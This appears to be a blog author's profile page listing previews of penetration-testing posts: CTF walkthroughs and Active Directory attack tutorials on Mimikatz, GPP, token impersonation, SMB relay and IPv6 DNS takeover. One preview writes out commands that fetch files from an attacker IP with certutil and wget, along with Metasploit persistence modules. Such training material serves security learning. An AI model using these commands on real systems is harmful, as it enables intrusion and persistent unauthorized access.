Aditya Jha

33 Followers

Sep 10

Dark Web: Hidden Side of Internet

KEY CONCEPTS: The Dark Web is a network of websites that are not indexed by search engines and require specific software to access. These websites are hosted on an encrypted network and are not accessible with standard browsers. Encrypted Networks: An encrypted network is a network that uses encryption techniques to…

Dark Web Search

3 min read

Sep 9

Wgel CTF: Walkthrough

This is a very easy machine: we get in through SSH and then escalate our privileges to get the root flag. The first step is to run an Nmap scan. Command: nmap -T5 -p- -A <target IP> Now in…

Wgel Ctf

4 min read

Sep 3

Steel Mountain Walkthrough

INTRODUCTION: This room, Steel Mountain, is based on the series Mr. Robot. The very first question in the introduction is: What is the name of the employee of the month? If we go to the page and click to download the image then we can see the…

Mr Robot

4 min read

Jul 20

Post Exploitation: Active Directory

File Transfer
Certutil: certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt
HTTP: python -m SimpleHTTPServer 80
Browser: Navigate directly to file
FTP: python -m pyftpdlib 21 (attacker machine), ftp 10.10.10.10 (attacker IP)
Linux: wget

Maintaining Access
Persistence Scripts: run persistence -h, exploit/windows/local/persistence, exploit/windows/local/registry_persistence
Scheduled Tasks: run scheduleme

Post Exploitation

1 min read

Jul 18

AD ATTACKS WITH MIMIKATZ

OVERVIEW: What is Mimikatz? A tool used to view and steal credentials, generate Kerberos tickets, and leverage attacks. It dumps credentials stored in memory. Just a few attacks: Credential Dumping, Pass-the-Hash, Over-Pass-the-Hash, Pass-the-Ticket, Golden Ticket, Silver Ticket. CREDENTIAL DUMPING: We will use Mimikatz to dump credentials from a computer. We are assuming that a…

Mimikatz

3 min read

Jul 17

GPP Attacks: AD Post Compromise Attack

Overview: Group Policy Preferences allowed admins to create policies using embedded credentials. These credentials were encrypted and placed in a “cPassword”. The key was accidentally released (whoops). Patched in MS14-025, but the patch doesn’t prevent previous uses. Group Policy Pwnage: https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ ABUSING GPP: We will solve a machine which is available on Hack The Box. …

Gpp

3 min read

Jul 16

Token Impersonation: AD Post Compromise Attack

Overview: What are tokens? Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. Think cookies for computers. Two types: Delegate: created for logging into a machine or using Remote Desktop. Impersonate: “non-interactive”, such as attaching a network drive or a domain logon script. Steps: Pop a shell…

Active Directory Attack

3 min read

Jul 15

Domain Enumeration using BloodHound

Bloodhound Overview: Bloodhound is a tool that downloads Active Directory data and visualizes it as a graph, so that we can identify a lot of information about a network very quickly. Command to install Bloodhound: sudo apt install…

Bloodhound

2 min read

Jul 14

IPv6 Attack: An AD Attack

Overview: If both IPv4 and IPv6 are turned on and you are utilizing IPv4, then who’s doing DNS for IPv6? The simple answer is usually nobody. Now we will set up an attacker machine that listens for IPv6 and presents itself as the DNS server for it. When we reboot…

Ipv6

5 min read

Jul 12

SMB Relay: An AD Attack

What is SMB Relay? Instead of cracking the hashes gathered with Responder, we can relay those hashes to specific machines and potentially gain access. Requirements: SMB signing must be disabled on the target. Relayed user credentials must be admin on the machine. SMB signing will check that the packets are coming from the right place…

Smb Relay Attack

4 min read
